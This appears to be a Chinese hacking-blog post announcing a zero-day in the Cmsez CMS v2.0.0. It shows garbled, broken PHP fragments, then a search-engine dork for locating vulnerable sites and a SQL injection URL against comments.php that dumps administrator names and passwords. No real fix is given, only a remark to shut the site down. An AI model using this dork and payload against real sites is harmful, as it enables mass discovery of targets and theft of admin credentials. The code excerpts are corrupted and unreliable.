随易全站系统cmsez:Cmsez(随易)全站系统  0day

名称:Cmsez Web Content Manage  v2.0.0
document.close;";
;
 "saveComment":

--------------
viewimg.php
--------------

<?
//image.php 显示附件图片
 "file.php";
$user_info[user_level]"Guest" && $confirmtrue){
 "modules/member/index.php";
}{
sql="select id from $imgdb where aid=$aid order by id ";

---------------------
exp:
allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ
http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*

-------------------

修复方案:

最好把站关了... 

上篇文章: 木马生成技术

下篇文章: 浅谈黑客入侵 4条途径和防护

延伸阅读

• 2010-12-9-- 0day漏洞,windows xp/2003 0day漏洞临时防范方法
• 2011-1-29-- 0day漏洞,MHTML中曝出0day漏洞 影响各版Windows
• 2009-9-2-- 0day漏洞:微软IE 7 0day漏洞全面解析
• 2009-9-12-- oblog4.6:惊爆Oblog4.6  的0day